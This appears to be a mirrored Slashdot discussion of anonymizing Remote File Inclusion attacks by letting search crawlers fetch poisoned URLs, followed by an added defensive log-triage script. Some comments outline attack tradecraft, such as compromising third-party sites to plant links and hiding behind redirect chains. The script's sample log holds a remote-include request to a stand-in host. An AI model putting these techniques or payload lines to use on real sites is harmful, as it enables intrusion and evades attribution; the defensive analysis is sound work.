Slashdot Mirror


Anonymizing RFI Attacks Through Google

netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."

66 comments

  1. but is it a crime... by Sensor · · Score: 5, Interesting

    There is actually quite an interesting aside to this: would someone who used this technique actually be guilty of hacking? After all, they don't run the exploit and arguably can't guarantee that anyone will.

    If I happen to create a utility capable of cracking a site but then store it for research, never distribute and never actively use it, then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present it's only the person who actively uses it that is guilty of a crime.

    However, in this scenario (even if I could be traced) it's arguable that *I* never attacked a site; all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent amendment to the UK's Computer Misuse Act (i.e. reasonable belief that the tool would not be used in that fashion), but still...

    As always it comes down to people...

    PS:
    As an aside, I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 Amazon voucher) then please take a look at:

    https://msc-survery.priogenus.com/amazon.php

    1. Re:but is it a crime... by MartinJW · · Score: 2, Interesting

      I'm not so sure. The intent is there to commit the crime, and it's safe to assume that once the attack has taken place, the malicious user will be utilising the now open security hole for further ends. I guess it's a bit like getting a friend to kill someone - you would still be guilty of murder - wouldn't you?

    2. Re:but is it a crime... by Sensor · · Score: 0, Offtopic
    3. Re:but is it a crime... by Sensor · · Score: 2, Interesting

      Technically "conspiracy to murder", but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion... and someone then read your diary and chose to act upon it?

    4. Re:but is it a crime... by MartinJW · · Score: 1

      But you are not leaving a note on 'how it can be done'. You are putting a cyanide tablet in your grandma's teapot so that she pops off the vicar next time he calls.

    5. Re:but is it a crime... by Not_Wiggins · · Score: 2, Insightful

      but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion...

      I'll preface this by saying IANAL...
      Prove? No. Provide circumstantial evidence? Yup.

      As the grandparent stated, the real judgment behind this crime is one of intent. The nature of these links is so specific, targeted and intentional, that even if one didn't get accused of willful attacking, he'd be guilty of negligence.

      Maybe it doesn't seem as clear-cut because we're "just talking about words."

      But the web provides action to words, real things that can happen based on materials produced. So, if we put the question within a different context, maybe the "crime" part becomes more apparent:

      How would you feel about a nuclear materials researcher leaving weapons-grade plutonium in an unlocked box in his back yard while posting a notice in the local paper that such material exists unprotected for anyone to harvest? Would he be making the bomb himself and destroying people with it? No. Would it be tantamount to such an act? Yes.

      I don't know how it would be prosecuted, but there's no doubt that it would be.

      I think the reason there's even question of legality to these types of attacks isn't because the moral implications are ambiguous, but because the law hasn't been able to keep up with the latest in cybercrime.

      --
      Diplomacy is the art of saying, "Nice doggie!" until you can find a rock.
    6. Re:but is it a crime... by Sensor · · Score: 1

      As someone whose father actually is a vicar, I can see how that would be a problem (although they do drink less tea than you might expect).

      But I'm still not sure I agree; it might be equivalent to choosing to store your own rat poison in your own teapot in a flat that you didn't lock.... I'm certainly not saying it's morally ok, but it's probably closer to reckless endangerment than anything else.

    7. Re:but is it a crime... by Anonymous Coward · · Score: 0

      Psst... you forgot the midlands in your survey.

    8. Re:but is it a crime... by Opie812 · · Score: 2, Funny

      as someone whose father actually is a vicar...

      Are you new to slashdot? The proper way to phrase this....ummmm...phrase is as follows:

      My father's a vicar you insensitive clod!

      :)

      --
      I'm not a nerd. Nerds are smart.
    9. Re:but is it a crime... by mysticgoat · · Score: 1

      However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location.

      IANAL, but it seems to me that there is a long history of "public nuisance" and "reckless endangerment" in common law that could be applied here (at least in countries like the UK and the USA whose legal systems are grounded on common law).

      At present, if you created such a link and I discovered your link was accessible from within my municipality, I could petition my local court to fine you rather heavily for creating a public nuisance that recklessly endangers the legitimate business interests of the city, and require you to fix the site. This is commonly used for controlling things like uncapped wells that put toddlers at risk, fire hazards of various kinds, and so on, and is usually one of the more easily accessible court actions.

      So far as I know, this use of municipal courts to control internet misbehavior has not yet been attempted, but I don't think there is anything to prevent that. It might take a while to find judges with the vision to understand the issues and the gumption to take on these cases, but there are a lot of different jurisdictions where these complaints could be filed. I'm not sure how issues of jurisdiction and the effects of negative publicity would play out, but it would be interesting to see what might happen. In essence, rather than trying to create a new big club to beat the intarweb miscreants into line, we'd be protecting our tubes with the threat of being nibbled to death by ducks.

    10. Re:but is it a crime... by Ruff_ilb · · Score: 1

      I, for one, welcome our new Vicar overlords.

      --
      http://www.TheGamerNation.com/Forums
  2. Anonymous? by tttonyyy · · Score: 3, Informative

    Aside from triggering the attack, how does this make it anonymous?

    Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code (but perhaps not who triggered it).

    --
    biopowered.co.uk - catalytically cracking triglycerides for home automotive use since 2008. Just say no to big oil!
    1. Re:Anonymous? by Zedrick · · Score: 3, Informative

      Yes, but the URI-with-malicious-code is usually something like: http://www.geocities.com/xxxxxxx/xxx.txt

      At least that's what I usually see every time I check the logs of a website I'm going to shut down for allowing foreign includes (to be run).

    2. Re:Anonymous? by kestasjk · · Score: 1

      Exactly; you can use linkto:mysite.com to find who has been linking to you. Hardly makes finding your attacker any harder; why not just use Tor, go to an internet cafe, or go wardriving?

      This seems like something clever and pointless just for the sake of it.

      --
      // MD_Update(&m,buf,j);
    3. Re:Anonymous? by Mike89 · · Score: 1

      Exactly; you can use linkto:mysite.com to find who has been linking to you

      I don't know about anyone else, but this doesn't actually work for my site.. on closer inspection, it doesn't work on my friend's URL either.. hell, it doesn't work for Slashdot either!

      http://www.google.com/search?q=linkto%3Aslashdot.org
    4. Re:Anonymous? by ArsenneLupin · · Score: 1

      Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code

      Nope, googlebot doesn't fill in the referer :-(

      However, it's not anonymous either. You can bet that if the victim server's admin understands how this was done, he will have no problem getting the relevant data from google's log, and there goes your little scheme!

      So, this trick should never be used "on its own". It's still useful however, and here's how:
      Don't put these poisoned links on any of your own servers. Instead, first SQL-rape an unrelated third party web site (via a proxy, just to be careful), and leave your doctored link there. Now, whenever google visits that page (or, anybody else follows the link, for that matter...), your real target will be SQL-raped!

      And it needn't be google either: put your doctored link as an <img src=, and now just any visitor to that doctored page will do the dirty deed. The victim webmaster will see people from all over the world come in and go apeshit over his server. With a little bit of luck, the customer will just throw his hands up in the air, and take his business to a provider who uses Linux...

    5. Re:Anonymous? by Umbrae · · Score: 1

      That's because it's not linkto, it's link:

      http://www.google.com/search?as_lq=slashdot.org&btnG=Search

    6. Re:Anonymous? by Anonymous Coward · · Score: 0

      One of the reasons why this is more dangerous than a straight-forward attack is that many sites give Googlebot elevated privileges. The right user agent from the right IP range can often access pages which normally require authentication, so that the pages can be found with Google but aren't accessible without paying or registering (you can suppress the Google cache for these pages).

      Another problem is that it's a time-delayed attack. Quick freeze and short data retention times don't work when the act of placing the link and the observable attack are separated by days or even weeks.

  3. change behaviour for bots by cucucu · · Score: 4, Informative

    In your server, you can code the logic to take another action if the user agent is a bot.
    Here you have a db of web robots.

    1. Re:change behaviour for bots by Anonymous Coward · · Score: 1, Interesting

      If you do that, prepare to be delisted from search engines or at least severely downranked. Showing different pages to bots than to regular clients is called cloaking and, since it is a technique primarily used to spam search engines, the major search engines test for cloaking and punish it. Technically a page is addressed by the URL, cookies, user agent, referrer and other pieces of request information, but search engines expect that you deliver the same main content for the same URL, all other request data be damned.

    2. Re:change behaviour for bots by LiquidCoooled · · Score: 1

      No, you should not have to change your site.
      Excluding google usually causes more issues (especially when management chirp up and say why aren't we being indexed).

      This is a problem between google and the destination site.
      Google are the ones here that are not verifying the URLs and attempting to use bad links.

      The destination site should be using the best web server they can which is known to handle these kind of problems properly.
      The web is broken in so many ways, google should have a good idea which are well formatted URLs and which may lead to problems.
      A link could be posted anywhere which the google bot will try to index.
      If it's a corrupted entry it should be dropped before testing.

      --
      liqbase :: faster than paper
    3. Re:change behaviour for bots by kimvette · · Score: 1

      Google are the ones here that are not verifying the URLs and attempting to use bad links.

      Googlebot presumes all provided links are good until it touches each one and sees the response header. If a 200 or 302 comes back, obviously it's a valid URL handled by the server. Whether the target of that URL is malicious or not is not really for Google to determine; all they do is crawl linked and submitted sites via an automated process. The responsibility is shared between Microsoft and the server admin to ensure that Windows patches are released and properly installed, respectively.
      --
      The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
  4. In reality... by lpiob · · Score: 2, Insightful

    It's a feature, not a bug.

  5. Reminds me of this post by epsalon · · Score: 1

    The Spider of Doom at The Daily WTF.

  6. RFI by kevin_conaway · · Score: 1

    Could someone define the RFI acronym? Neither the summary, article or google can explain it clearly.

    1. Re:RFI by Anonymous Coward · · Score: 2, Informative
    2. Re:RFI by Loconut1389 · · Score: 1

      I always think of Radio Frequency Interference, but oh well. As defined above, Remote File Inclusion.

    3. Re:RFI by Anonymous Coward · · Score: 0

      Radio-Frequency Interference. HTH!

    4. Re:RFI by that+this+is+not+und · · Score: 1

      RFI is a prominent acronym in the technical community. It means, as you say, Radio Frequency Interference. Apparently, though, it's a cool-sounding acronym that some other circle decided to latch onto. I strongly doubt it will EVER mean 'Remote File Inclusion' outside a narrow subculture, however.

    5. Re:RFI by Loconut1389 · · Score: 1

      Off the top of my head, I couldn't think of another way to say remote file inclusion any better- so I at least grant that they seem to have a valid overlapping use for the acronym.

    6. Re:RFI by nacturation · · Score: 1

      Off the top of my head, I couldn't think of another way to say remote file inclusion any better- so I at least grant that they seem to have a valid overlapping use for the acronym.

      It's a pretty good acronym if you actually are discussing including files. However, this attack is like me linking to http://site.com/database.php?hack-in-querystring which has nothing to do with including remote files. Both bots and humans could follow that link and "attack" the site.

      --
      Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
    7. Re:RFI by that+this+is+not+und · · Score: 1

      True, but when I read 'RFI Attacks' I automatically assumed it was somebody interfering with some form of wireless communications. So long as they want to use an acronym that obscures meaning. Oh, wait... it's a narrow subculture we're talking about here....

      (nothing wrong with narrow subcultures, btw. nerds of any flavor are okay most times)

  7. How not Who by MartinJW · · Score: 5, Informative

    If your web application is vulnerable to attack then I would have thought it makes no difference where that attack comes from - be it a 'real' person or a search bot. You should spend more time worrying about whether your application is secure, the how is more important than the who.

    1. Re:How not Who by Anonymous Coward · · Score: 0

      This is oOOOOLLLDDDD

    2. Re:How not Who by deryckh · · Score: 2, Interesting

      Agreed. The problem I have with these sorts of things is they act as if the problem is with Google. It's not (or any other search engine for that matter). The problem is with the site that is vulnerable. Fix the security hole and there's nothing to worry about.

  8. ----- Wrong URL above ----- by Sensor · · Score: 0, Offtopic

    sorry... the url above should read:

    https://msc-survey.priogenus.com/amazon.php

  9. Remote File Inclusion by Bogtha · · Score: 4, Informative

    Remote File Inclusion. It's a pretty poor term for this type of attack, because it's not the act of inclusion that causes the problem, it's the act of requesting the file in the first place.

    --
    Bogtha Bogtha Bogtha
    1. Re:Remote File Inclusion by shoolz · · Score: 1

      Actually, it's a perfectly good name for the attack, since the request causes a .PHP file hosted on a remote server to be included and subsequently run. Perhaps a hyphen might help those who are hung up on it: "Remote-File Inclusion".

      Here's an example of an RFI attack designed to exploit a bit of sloppy coding in PHP Nuke.

  10. RFI? How about defining this? by Ashtead · · Score: 5, Informative

    Radio Frequency Interference? Request for Information? Radio France Internationale? Rodent Fangs Implementation? WHAT?

    How about explaining what such an ambiguous acronym actually means initially. As neither TFA nor the summary seems to have done so, I therefore will have to do it here, just to make heads and tails of the rest of the discussion and perhaps illuminate someone else. Hit Google, slog through a pile of links indicating one of the above, or some company whose name includes the three letters. There are many of these. On page 3 I found the Wikipedia page for this TLA, on which there is a dead link to what this must be: Remote File Inclusion.

    How about that.

    I was wondering if it was just me, that I had been off-line for too long (like 2 days) and missed out on the latest and greatest buzzword, again?

    --
    SIGBUS @ NO-07.308
    1. Re:RFI? How about defining this? by MartinJW · · Score: 1

      I guess it is a result of the rush to submit an article first, thus a frantic cut-and-paste job pulls the TLA out of the context in which TFA was posted, where it probably made perfect sense.

    2. Re:RFI? How about defining this? by owlnation · · Score: 1

      how about Really F***ing Irritating?

    3. Re:RFI? How about defining this? by Anonymous Coward · · Score: 0

      Hello. If you hadn't noticed, this is the internet. You're allowed to say 'fuck' here.

    4. Re:RFI? How about defining this? by Anonymous Coward · · Score: 0

      OK, so WTF is TLA?

    5. Re:RFI? How about defining this? by hey! · · Score: 3, Informative

      I'm guessing from the text of the article it is Remote File Inclusion.

      The description of the mechanism doesn't really make sense. If you can exploit a victim site by feeding it an evil URL in a form parameter, why use Google at all? You've lost anonymity by including the URL.

      Looking at the described effects, it sounds like what they do is feed google some malicious code wrapped up in something that looks like a URL on the victim site. Then Google spiders the URL, placing malicious content in the form parameters.

      So, suppose you have a malicious SQL injection attack that causes your database to dump the password table to a remote database. The trick is that you get Google to launch the attack for you. You have the malicious code obfuscate the destination, and it isn't clear skullduggery is going on by casual inspection of the logs. It won't show up in the database logs either because it's not a transaction.

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
    6. Re:RFI? How about defining this? by Anonymous Coward · · Score: 0

      It's not only you.

    7. Re:RFI? How about defining this? by Fatalis · · Score: 2, Funny

      Yes, WTF is a TLA.

      --
      Deus est fatalis
    8. Re:RFI? How about defining this? by ladadadada · · Score: 1

      Strangely enough, the anonymity and the remote file inclusion are not the only issues here. I recently discovered Yahoo's Slurp running these sorts of queries (they were parameters to a search page) on several different sites that we host. The "attacker" had realised that we use the same code across several sites and could use exactly the same "exploit".

      The interesting part was that the goal of the "attacker" was not to run an exploit against our machines but to attempt to inject a link into the page that Yahoo would then index and would increase the pagerank of the target of the link. The targets of the links all seemed to be Google Adsense spam pages. The "attacker" was basically using our reasonably good pagerank to increase his.

      The easiest solution we found was to disallow spiders from crawling search results pages as they should be able to find all of our pages by following links on the site and shouldn't need to use the search. There's probably a down side to this approach but it seems to work so far.

      --
      Sig matters not. Judge me by my sig, do you?
  11. Simple solution by vivekg · · Score: 4, Interesting

    Seriously, I hate to read articles like this one. They don't offer any solution..... these kinds of attacks are not new at all; you can find tons of such attacks in the access.log file:

    tail -f /var/log/httpd/access.log

    First get rid of fat Apache and use something small and secure like lighttpd if you are running a *small personal* web site. Second, put lighttpd / Apache in a chrooted jail and no one can install a *php/perl* shell. I have documented the procedure for putting lighttpd in a jail:

    http://www.cyberciti.biz/tips/howto-setup-lighttpd-php-mysql-chrooted-jail.html

    Both Yahoo and Google run their entire web servers in chrooted jails. Another choice is to use OpenBSD, which runs Apache in a chrooted jail out of the box.

    --
    The important thing is not to stop questioning --Albert Einstein.
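Two posts in this thread point at the same defensive task: vivekg says these attacks show up in access.log, and ladadadada found a spider fetching search-page URLs that carried injected links. The following is an added example, not code from the thread or from any poster, of triaging such log lines: it decodes each request's query parameters, flags any parameter whose value holds an absolute URL to a host you do not own (the RFI pattern as well as the injected-link pattern), records whether the requester claims to be a crawler, and groups findings by the host serving the payload rather than by the requesting IP, which belongs to the search engine. All log lines, hostnames and addresses in it are constructed.

```python
"""Triage Apache combined-format access.log lines for crawler-relayed RFI requests
and spider-delivered link injection. Added example, not code from the Slashdot
thread or any poster; every log line, hostname and IP here is constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Absolute URL inside a decoded parameter value; group 1 is the host serving the payload.
URL_IN_VALUE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# Crawler user-agent fragments. This only labels a request: the user-agent is
# client-supplied, so it must never be used to grant a request extra privileges.
CRAWLER_UA = ("googlebot", "slurp", "msnbot", "bingbot")

# Constructed sample log: (1) Googlebot fetching an include parameter that points at a
# remote file, (2) a plain Googlebot fetch, (3) Yahoo Slurp fetching a search page whose
# query carries an injected link, (4) a browser request, (5) a redirect to our own host.
SAMPLE_LOG = """\
66.249.66.1 - - [10/May/2007:10:01:02 +0000] "GET /index.php?page=http://pages.example.net/~u/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.1 - - [10/May/2007:10:01:03 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.0.9 - - [10/May/2007:10:02:10 +0000] "GET /search.php?q=%3Ca+href%3D%22http%3A%2F%2Fads.example.org%2F%22%3Ecasino%3C%2Fa%3E HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp)"
10.0.0.5 - - [10/May/2007:10:03:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 1400 "http://www.example.com/" "Mozilla/4.0 (compatible; MSIE 7.0)"
10.0.0.6 - - [10/May/2007:10:04:00 +0000] "GET /redirect.php?to=https://www.example.com/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_crawler(user_agent):
    """True if the user-agent string claims to be one of the listed crawlers."""
    ua = user_agent.lower()
    return any(tag in ua for tag in CRAWLER_UA)

def find_remote_urls(target, own_hosts):
    """Yield (parameter, host) for each query parameter whose decoded value holds an
    absolute URL to a host we do not own. Decoding first matters: the injected link
    in sample line 3 is percent-encoded and invisible to a raw grep for 'http://'."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for host in URL_IN_VALUE.findall(value):
            if host.lower() not in own_hosts:
                yield name, host.lower()

def triage(log_text, own_hosts=("www.example.com",)):
    """Scan a log and return one finding per (request, parameter, remote host)."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param, host in find_remote_urls(rec["target"], own):
            findings.append({
                "ip": rec["ip"],                 # the crawler's address, not the attacker's
                "crawler": is_crawler(rec["ua"]),
                "path": urlsplit(rec["target"]).path,
                "param": param,
                "remote_host": host,             # where the payload is actually hosted
                "status": int(rec["status"]),
            })
    return findings

def hosts_by_count(findings):
    """Group findings by payload host: that is the lead worth chasing, since banning
    the requesting IP would only block the search engine that relayed the request."""
    counts = {}
    for f in findings:
        counts[f["remote_host"]] = counts.get(f["remote_host"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        who = "crawler" if f["crawler"] else "client"
        print(f"{f['ip']:<12} {who:<8} {f['path']} {f['param']}= -> {f['remote_host']} (HTTP {f['status']})")
    print(hosts_by_count(triage(SAMPLE_LOG)))
```

Note that the referer field is "-" on the crawler lines, matching ArsenneLupin's observation that googlebot sends none, so the page that carried the poisoned link has to be found from the search engine's side rather than from your own log.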
    1. Re:Simple solution by AlXtreme · · Score: 1

      Don't think that you're safe in your chroot'ed jail. If your website for example uses mod_php and you run an old package of Mambo, then you will be exploited despite your jail.

      Yes, you are correct that such a setup will save you from certain attacks, however this isn't an alternative for proper, secure coding. Besides, anyone still using system() via a webserver (be it Apache or LightTPD) should be shot, regardless.

      --
      This sig is intentionally left blank
    2. Re:Simple solution by nacturation · · Score: 1

      Don't think that you're safe in your chroot'ed jail. If your website for example uses mod_php and you run an old package of Mambo, then you will be exploited despite your jail.

      How so? You'll also need to install the PHP libs and old Mambo package inside the jail and run as non-root. Are you saying that PHP+Mambo can break outside a chrooted jail in OpenBSD? Worst case, they hack the jail but your base system hasn't been compromised.

      --
      Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
  12. Old news by Anonymous Coward · · Score: 0

    Dave Korn just pointed out on Full Disclosure:

    Gadi Evron wrote:
    > > Noam Rathaus on using Google to anonymize attacks on websites:
    > > http://blogs.securiteam.com/index.php/archives/746

    > > By placing a URL on any web page, Google will find it, visit it and
    > > then index it. With this mechanism, it is possible to anonymize
    > > attacks on third party web sites through Google by the use of its
    > > crawler.

    This technique was described by Michal Zalewski in Phrack years ago.

    http://www.phrack.org/archives/57/p57-0x13

    cheers,
    DaveK
    --
    Can't think of a witty .sigline today....
    Firefox users: paste into your URL bar: "google site:neohapsis archive Full Disclosure" (assuming you've a smart keyword search set up for google - I much prefer em to the smart search bar - but I digress)
  13. don't need google by cucucu · · Score: 1

    Who needs google? There is always that ./ mob willing to click through any url without giving a second thought, no matter how long the way and how worthless its end.

    1. Re:don't need google by TheLink · · Score: 1

      Heh I was expecting goatse.cx

      Anyway you can turn on the preview feature for tinyurl - so it displays the url first without taking you straight to it. I recommend that.

      But the other url shortening services may not have such a feature.

      Anyway, if you do the attack mentioned in the article it might be a good idea to use tinyurl or other similar sites, so that it is google and friends that expand the resulting url, so it is harder for the victim to figure out who hosted the original shortened url - since they only have the expanded url to work with. Unless perhaps google sends the url of the referring page?

      I'm not sure if Google will display/store the resulting url from a 302 redirect or it will display/store the original url which could look very harmless and changed to be harmless AFTER the attack has occurred.

      e.g.

      Whenever something tries to access http://attackers.website/myphotos/
      they get a list of thumbnails, one of which loads:
      http://intermediate.website/images/thumbnail.gif
      Which 302 redirects to http://victims.website/buggycgi?param=payload&boom

      But the second time round everyone just gets a thumbnail pic.

      So it will be hard to prove who was the culprit.

      BTW there are plenty of other things you can do with url shortening services. Many of these allow you to add stuff to the end of the urls which will be re-added after the url is expanded!

      For example: http://tinyurl.com/8hw would take you to slashdot and

      http://tinyurl.com/8hw/my/logout would log you out from slashdot.

      You can use this feature for sites that require you to submit urls that end with a jpg or gif - e.g. avatar image or something like that.

      I leave it as an exercise to the reader to figure out more stuff they can do with such things... ;)

      --
  14. Nothing new by radu.stanca · · Score: 0, Redundant
  15. Glasshouses... by ArsenneLupin · · Score: 2, Informative

    ... The Daily WTF runs on ASPX. These are bold people. Very bold people.

  16. In Soviet Russia - with a twist by davidwr · · Score: 1

    In Soviet Russia, Google Hacks ...

    I c-can't do it. *sob*. This is too easy. It's like taking candy from a baby. I'm sorry.

    [walks away]

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
  17. No news... But this is... by Anonymous Coward · · Score: 0

    While I consider the URL in the article not to contain any news, the content of the following URL, which is linked from within the comments, was news to me:

    http://blog.php-security.org/archives/49-Google-Request-Forgeries.html

  18. Against the System: Rise of the Robots by lazy321 · · Score: 1

    Check http://www.phrack.org/archives/57/p57-0x13 by Michal Zalewski from 2001

  19. Prior art by Beryllium+Sphere(tm) · · Score: 1

    This was described in Zalewski's _Silence On The Wire_.

  20. It's not "HACKING WITH GOOGLE" it's using google by itz2000 · · Score: 1

    It's not "HACKING WITH GOOGLE" it's using google to exploit vulnerabilities via the search
    In the particular example it's searching in the code for where cmd.gif is, to use it to enable something malicious via a remote site.

    It's not like using google to hack a specific site, but just those sites which are vulnerable (it's like searching for which site has phpbb2.6 and using known exploits to "hack it" [with SQL injection or something]).

    This discovery is for script kiddies, not for real hackers who want to hack a specific site (unlike script kiddies, who mostly would like to "hack" any site they can, no matter which one, only to show off to their friends or to themselves in case they don't have any).
    Cheers.

  21. Covert communications channel? by pipingguy · · Score: 1

    Couldn't the gibberish (designed to defeat filters) contained in spam also be a "Covert communications channel"?

  22. I studied this 3 years ago by mrkitty · · Score: 1

    I started doing this a few years ago. Check out the link below and view source. I got the data over a year; however, it is a few years old. I was studying which engines could be abused in the 'best way'. Short answer, all of them.... http://web.archive.org/web/20030426184220/http://www.cgisecurity.com/

    --
    Believe me, if I started murdering people, there would be none of you left.
  23. no - doesn't require searching. by tendays · · Score: 1

    rtfa again - this *is* used for targeting specific sites. Google is used as an anonymiser.

    The article suggests searching cmd.gif to demonstrate that that method is being used, and indeed some of the results show that google's index carries urls containing attacks.

    To inject those urls into google's index the attacker doesn't even need to run a search or even contact google a single time - he puts the attack (mentioning the specific host the attacker wants to attack) on some webpage and then waits for google to find it and run the attack.

    Then, optionally, using google's cache, the attacker could go check the result of his attack.

  24. In Other News by RAMMS+EIN · · Score: 1

    In other news, vulnerabilities in your application can be exploited not just by the cracker, but also by an agent working for the cracker.

    Remember, you heard it here first!

    --
    Please correct me if I got my facts wrong.